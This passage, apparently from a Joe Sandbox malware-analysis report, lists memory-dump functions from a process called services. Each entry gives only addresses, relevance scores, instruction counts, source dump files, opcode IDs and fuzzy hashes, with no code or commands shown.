                                                                                                                                • Instruction Fuzzy Hash: 51116731A08A4D8FDB40EF58C899AEA7BA0FF68304F0105AAE459C7261DB30A584CB80
                                                                                                                                Function 00007FFD9BFEADFA Relevance: .1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ff6e515a3d9a5677a2368b01065c6b3a25f04134c0c257010fcb479abdd5839
                                                                                                                                • Instruction ID: 03c8f2cbd8dbd5b897379a761811158d416c1671f55212d06a9293ce4b88ba6b
                                                                                                                                • Opcode Fuzzy Hash: 7ff6e515a3d9a5677a2368b01065c6b3a25f04134c0c257010fcb479abdd5839
                                                                                                                                • Instruction Fuzzy Hash: 0111C421E1ED9E5EDFA58FA598615FE7BB1FF44300F0102BAC00BD21A2DE2A66148790
                                                                                                                                Function 00007FFD9B7B1C85 Relevance: .1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b0f65cd5921ac2a19aedd56d984f30e3bee9720ee6dc48e71e7093dc37a86095
                                                                                                                                • Instruction ID: cdc183a0db791ee8eb9c05df4e167f7c1166ca8596b9ad04e06fb37cb9f4cd9c
                                                                                                                                • Opcode Fuzzy Hash: b0f65cd5921ac2a19aedd56d984f30e3bee9720ee6dc48e71e7093dc37a86095
                                                                                                                                • Instruction Fuzzy Hash: 86112835A08A4D8FDF45EF68C859AE97BF0FF68305F0405AAE418D72A1DB30A544CB80
                                                                                                                                Function 00007FFD9BE6168E Relevance: .1, Instructions: 60COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 034cb0f647161e99ba907efc9e13c540140af3914906d98eb19efdb868f26f03
                                                                                                                                • Instruction ID: ff425a270347800b8ec51853689802695ca6aeedd62787d692765e8b2717b5f5
                                                                                                                                • Opcode Fuzzy Hash: 034cb0f647161e99ba907efc9e13c540140af3914906d98eb19efdb868f26f03
                                                                                                                                • Instruction Fuzzy Hash: 32118C3234D54E8FE71A8A68D4647FD7B91DF55310F18027FD649C31E2CA15A7618381
                                                                                                                                Function 00007FFD9BFE4F77 Relevance: .1, Instructions: 60COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 15e99ea72655d79478bbca7f5cb13e523657c960ad15bd38bae371862efa915a
                                                                                                                                • Instruction ID: 4a751b3d61abf3000ad253245ec0e25f4e3b4c4e3996764a5f3df8394b5b5a2c
                                                                                                                                • Opcode Fuzzy Hash: 15e99ea72655d79478bbca7f5cb13e523657c960ad15bd38bae371862efa915a
                                                                                                                                • Instruction Fuzzy Hash: 4E113330B08A1C8FCB98DF18D894A6977E2FF58305B5142AED04EDB2A6CF31AD41CB41
                                                                                                                                Function 00007FFD9BFEC1C0 Relevance: .1, Instructions: 60COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7bcabd1ef8f1af0cb35184b4a170caf5184b84be50dab3b761456ed91ee103c0
                                                                                                                                • Instruction ID: ff717a8b3fba1c1e4789128da733f219fc356a93b684e81ff83d8d834c1d7e0b
                                                                                                                                • Opcode Fuzzy Hash: 7bcabd1ef8f1af0cb35184b4a170caf5184b84be50dab3b761456ed91ee103c0
                                                                                                                                • Instruction Fuzzy Hash: 5811E971A1991D9FDF9CDB98D465ABDB7A1FF58300F0001BEE00ED3691DE3569908B41
                                                                                                                                Function 00007FFD9BFEBE71 Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fc39eea507a6c87eed7e67cce676c05fee0dd524de686806b07917cc513be17b
                                                                                                                                • Instruction ID: 3d17675a72769059b62a75c91dcc45b3954189b827658556efb3d4237dc01fa2
                                                                                                                                • Opcode Fuzzy Hash: fc39eea507a6c87eed7e67cce676c05fee0dd524de686806b07917cc513be17b
                                                                                                                                • Instruction Fuzzy Hash: F411E911F0F2DB8AE33A5BF418B157C7A615F42650F0A03FBD5898A0F3DC1E29449792
                                                                                                                                Function 00007FFD9BFED4D6 Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d261da2248e3373f6d3539e9946b1ddeac9e255edab99366cc2fa5561f859290
                                                                                                                                • Instruction ID: 3e78036f36d9bf0e0a49cfe717f4246619d1b7bf622de011cc78bbb42208a2c8
                                                                                                                                • Opcode Fuzzy Hash: d261da2248e3373f6d3539e9946b1ddeac9e255edab99366cc2fa5561f859290
                                                                                                                                • Instruction Fuzzy Hash: 8B010406B1FB8A1FE77509B458701781BA09F42150B0B53BBC44ACB9F3DD0A6A464351
                                                                                                                                Function 00007FFD9BFE4F13 Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 464063c9c69af73bece769a4bcf0c63cf66580e301059197cb93bebbe998b95a
                                                                                                                                • Instruction ID: 02dafce989796b5db4310ce7e00c00d7696c897c9a9806719b979b96b1c54f7b
                                                                                                                                • Opcode Fuzzy Hash: 464063c9c69af73bece769a4bcf0c63cf66580e301059197cb93bebbe998b95a
                                                                                                                                • Instruction Fuzzy Hash: 1B015230B1864C8FD798DF588895A7D77E1FF49305B4501BDD04EDB5A6CE35AD418B01
                                                                                                                                Function 00007FFD9BFE202E Relevance: .1, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 793f1b4e423aa278aa4e69ed99a74e5dbeee4fea773ead35cff82b0892e73eaa
                                                                                                                                • Instruction ID: 2894c86c8e0db3418bbc42f7745f65cfaf22c677c4c22dc3152fcf71677db1a1
                                                                                                                                • Opcode Fuzzy Hash: 793f1b4e423aa278aa4e69ed99a74e5dbeee4fea773ead35cff82b0892e73eaa
                                                                                                                                • Instruction Fuzzy Hash: AA01A131A1E69E5EEF659FE888215FEBBB1FF45300F0502B6C109D61E2EA297604C791
                                                                                                                                Function 00007FFD9BFE9383 Relevance: .1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: af5be7219f0e5089c5df76ee678680858c16751992c81ad64e2e514d439c5fde
                                                                                                                                • Instruction ID: 37c9ca0feee270be1b59c956b8802d46dead599fcf18ffb2e81726561ac611c7
                                                                                                                                • Opcode Fuzzy Hash: af5be7219f0e5089c5df76ee678680858c16751992c81ad64e2e514d439c5fde
                                                                                                                                • Instruction Fuzzy Hash: FF11F970E0560E8FDB64DF98C454ABEB7F1FF58301F14427AD019E32A1DB756A918B40
                                                                                                                                Function 00007FFD9BE64000 Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 525393cc8c89061ad37c79486101b570021f2b11b3555936a0fe81f678601554
                                                                                                                                • Instruction ID: 58cb4b29f3b65a5dfd5c1d7128d7b502d85637933263f02ed521015c28a68f39
                                                                                                                                • Opcode Fuzzy Hash: 525393cc8c89061ad37c79486101b570021f2b11b3555936a0fe81f678601554
                                                                                                                                • Instruction Fuzzy Hash: A6013922F0FC6F8EF67816E5243117C56595F45310F2605BAE42E861E6DC2E2B5062D2
                                                                                                                                Function 00007FFD9BFE60AC Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 92970de4db1789836482165dc24f53158f5fcc40a7c2039f1d1b8f07575d2c84
                                                                                                                                • Instruction ID: bf159c1bcb7f8a268ceb1d1d38d9d37c58fc7aeddaa9d2752fe00b785ea926cc
                                                                                                                                • Opcode Fuzzy Hash: 92970de4db1789836482165dc24f53158f5fcc40a7c2039f1d1b8f07575d2c84
                                                                                                                                • Instruction Fuzzy Hash: 38019C21A0EA595FC722AA74A8349FE7BA0DF41360B4106BBD0CACF4E3CE18650683C0
                                                                                                                                Function 00007FFD9BFED1F7 Relevance: .1, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7b79bc70c35b4bc4542dc90c087698560358f8722575d3b593aa8a2dbf927435
                                                                                                                                • Instruction ID: b93ae6fcbbe5498beba4c7432e6a758b24000b318dafbe0af0efcceb893719ea
                                                                                                                                • Opcode Fuzzy Hash: 7b79bc70c35b4bc4542dc90c087698560358f8722575d3b593aa8a2dbf927435
                                                                                                                                • Instruction Fuzzy Hash: 4401D832B1CA0D5FD718DA8CA4615BCB3A2FF493207115279D05ED3A96CE15BD2287C0
                                                                                                                                Function 00007FFD9BFE4F1C Relevance: .1, Instructions: 51COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27a87faf0cc73cb52bdd550336a7dbf7e066a793a6f55e41e8d2f925d4025bfe
                                                                                                                                • Instruction ID: 7b89387754f91f06fe4bb3f829c9378924b5b747212d28f6971e19265981a5a8
                                                                                                                                • Opcode Fuzzy Hash: 27a87faf0cc73cb52bdd550336a7dbf7e066a793a6f55e41e8d2f925d4025bfe
                                                                                                                                • Instruction Fuzzy Hash: FB014430B09A4D8FD794CF58C8A9A7D77E1EF59305B41427ED04EDB6B5CE21A9418B01
                                                                                                                                Function 00007FFD9B7D9739 Relevance: .1, Instructions: 51COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3a2a96bced9fda39227f64a9a34b939a32225d68fc1b5bf501c979c0b3cc28d1
                                                                                                                                • Instruction ID: 59de7ee35ed81b92139783eb356964461f2115c6c56fa49986995490da3d569b
                                                                                                                                • Opcode Fuzzy Hash: 3a2a96bced9fda39227f64a9a34b939a32225d68fc1b5bf501c979c0b3cc28d1
                                                                                                                                • Instruction Fuzzy Hash: 01110C7090868D8FCF45EF68C859AE97BF0FF28305F0506AAE859D72A1DB34D554CB81
                                                                                                                                Function 00007FFD9BE60F38 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fbc51132f5fc04944696deda410cb38d329cb4d9fc2501f94777bb9c7696bcb0
                                                                                                                                • Instruction ID: 3adbd3903e2eb134de90f09e1285400008807ffb06853fbe227e189b2a6d46b8
                                                                                                                                • Opcode Fuzzy Hash: fbc51132f5fc04944696deda410cb38d329cb4d9fc2501f94777bb9c7696bcb0
                                                                                                                                • Instruction Fuzzy Hash: 9501D802F6F5AF8FE7F541A804F48780B455B11950F1A05BAE44AC71E7EC0A6E496351
                                                                                                                                Function 00007FFD9BE66CA8 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2d0f55d5f183e196daf9fcf5571b029c1e8e422282fe3881cf57f6c22d71b05f
                                                                                                                                • Instruction ID: d0e4e1ff05e43e6e908487af221119f1e3087f42c71cc51af27d990bf25b46e0
                                                                                                                                • Opcode Fuzzy Hash: 2d0f55d5f183e196daf9fcf5571b029c1e8e422282fe3881cf57f6c22d71b05f
                                                                                                                                • Instruction Fuzzy Hash: DB119374E2981EDFDBA8DB88D460AEDB7B5FF58300F510579D40AE32A0DA3A6901DB50
                                                                                                                                Function 00007FFD9B791598 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6ad0fe3754e455f4ba3714e8a8bacd44491901c15aa3f7d813b7c79be281cf3e
                                                                                                                                • Instruction ID: 1f91d8ea46ceb65d39cb551fc726b38b5062f9b68b5a27bc2189c5c8adaade83
                                                                                                                                • Opcode Fuzzy Hash: 6ad0fe3754e455f4ba3714e8a8bacd44491901c15aa3f7d813b7c79be281cf3e
                                                                                                                                • Instruction Fuzzy Hash: 2811C431E0D39A9FD702ABA4C8216E97BB0EF43310F0546B6D855CB1E6CF386628C791
                                                                                                                                Function 00007FFD9B7AEF3B Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e7e38057bedc7b24deaed5c4af185b83d3bd6a20f2063d5b59ac3f60f102eb4c
                                                                                                                                • Instruction ID: a6f06b4684c5c88de3db72d6f85c4db48f6271fe6689b5e3819c47d9a4bca311
                                                                                                                                • Opcode Fuzzy Hash: e7e38057bedc7b24deaed5c4af185b83d3bd6a20f2063d5b59ac3f60f102eb4c
                                                                                                                                • Instruction Fuzzy Hash: BF11EC70E0561DCFDBE4DF98C8A47ACB7B1FB58311F2046A6D00DD32A5DA386A85CB40
                                                                                                                                Function 00007FFD9B7D6D49 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3fb09e0197a403df23696308db349d9e8c924817d3a943f484a5b2912f0cea06
                                                                                                                                • Instruction ID: 906c05785851ce51883ff0717b0911cac5211a3104628eccf612d46512afa32f
                                                                                                                                • Opcode Fuzzy Hash: 3fb09e0197a403df23696308db349d9e8c924817d3a943f484a5b2912f0cea06
                                                                                                                                • Instruction Fuzzy Hash: 34113C30908A4D8FCF45EF58C858AEA7BF0FF29304F0105AAE859D72A1D7349554CB80
                                                                                                                                Function 00007FFD9BE60C67 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 73ab2d9f715a35c9ed3445ceac11482db08033f8407237bb01b7ab78eccbd753
                                                                                                                                • Instruction ID: f2da8e7ad268eab745e374b5848127333bb180c3a9864f84038ac79f49f2d47a
                                                                                                                                • Opcode Fuzzy Hash: 73ab2d9f715a35c9ed3445ceac11482db08033f8407237bb01b7ab78eccbd753
                                                                                                                                • Instruction Fuzzy Hash: 12017C32B1991D9FCB64DA5CA4A16E8B3A1EF48720B05426AD05ED3292CA20BD22C7C1
                                                                                                                                Function 00007FFD9B794AC1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f43ee95634c6acc6c6237299f0d98d655595fc3333e7b3795dee32642f7ed945
                                                                                                                                • Instruction ID: 918bcc27d4f8ba30b22f306b722f9f84aaceefafc676eab2e0b1a68453b851e8
                                                                                                                                • Opcode Fuzzy Hash: f43ee95634c6acc6c6237299f0d98d655595fc3333e7b3795dee32642f7ed945
                                                                                                                                • Instruction Fuzzy Hash: C7111930A0561A8FEB68EB58C8587A8B3F0FF54305F4042E5E04DA22A1DE786E85CF84
                                                                                                                                Function 00007FFD9B7D7149 Relevance: .0, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0c325a925599634e62fcfbbd2e7abfc4606cc9e801c3390641b3777e95a8cf63
                                                                                                                                • Instruction ID: 1277e1bd28c2befaa9446b38048056a317bcd41403873af8f1e3e535099e1f5a
                                                                                                                                • Opcode Fuzzy Hash: 0c325a925599634e62fcfbbd2e7abfc4606cc9e801c3390641b3777e95a8cf63
                                                                                                                                • Instruction Fuzzy Hash: 26010830908A4D8FCF85EF68C858AEA7BF0FF69305F0505AAD419D72A1DB359994CB80
                                                                                                                                Function 00007FFD9BE64AC4 Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 328860625239068eee36e10063cf29dfb4c35540df28cd8ba30b23f70a8d65ad
                                                                                                                                • Instruction ID: 76bb0e65d76f6a8f8fd091b322a05613d69d95b6275c048049be50910f3bd203
                                                                                                                                • Opcode Fuzzy Hash: 328860625239068eee36e10063cf29dfb4c35540df28cd8ba30b23f70a8d65ad
                                                                                                                                • Instruction Fuzzy Hash: 35F0C831B0CA088FD79CDF6898566BC73D1EB88325B14017FD58ED35A6DE2559028381
                                                                                                                                Function 00007FFD9BFE54F4 Relevance: .0, Instructions: 45COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c54b99248fe489fa8a12fb54fcc87ebec675e8aa20246153bf0286129b7ff7f
                                                                                                                                • Instruction ID: 24d18e2cdbb23aeb92515b23ab4593afc05ffdff757c31620358005718545e3e
                                                                                                                                • Opcode Fuzzy Hash: 6c54b99248fe489fa8a12fb54fcc87ebec675e8aa20246153bf0286129b7ff7f
                                                                                                                                • Instruction Fuzzy Hash: EDF08131B29A0E5BDB64EA5C84A1978B392EF88700B118279D40EC3286CF24BD02C7C1
                                                                                                                                Function 00007FFD9B7D9750 Relevance: .0, Instructions: 45COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ae07fa01f2d12f92d26e826f036a4bd38846323ea1ab7e18b65c96dba0aec175
                                                                                                                                • Instruction ID: 6bca6370ebf63b639500e8820b8b05058dbe6b4d22d89da7c9bc7b1088e1bef7
                                                                                                                                • Opcode Fuzzy Hash: ae07fa01f2d12f92d26e826f036a4bd38846323ea1ab7e18b65c96dba0aec175
                                                                                                                                • Instruction Fuzzy Hash: 7C01A874914A4D8FDF84EF58C859AFE7BF0FB68305F10066AA859D3264DB30E594CB81
                                                                                                                                Function 00007FFD9BE67A4B Relevance: .0, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0f45ea55b4805a18574ee7e10a6bcaf7695bb91b606c400e71b21cef812c602c
                                                                                                                                • Instruction ID: 173bef66836de7856d391d61b60ffe04fccc39fc4bb9ba30e33ac83c1eee2e19
                                                                                                                                • Opcode Fuzzy Hash: 0f45ea55b4805a18574ee7e10a6bcaf7695bb91b606c400e71b21cef812c602c
                                                                                                                                • Instruction Fuzzy Hash: 9401123190894CCFCF98EF58C865FD8B7B5EBA9315F1401A9D40DE7291DA31AAC5CB40
                                                                                                                                Function 00007FFD9B7915A0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7b165f47e929bb7a713615454ab014037f78e4ecf62437d795a44172b0aeec5
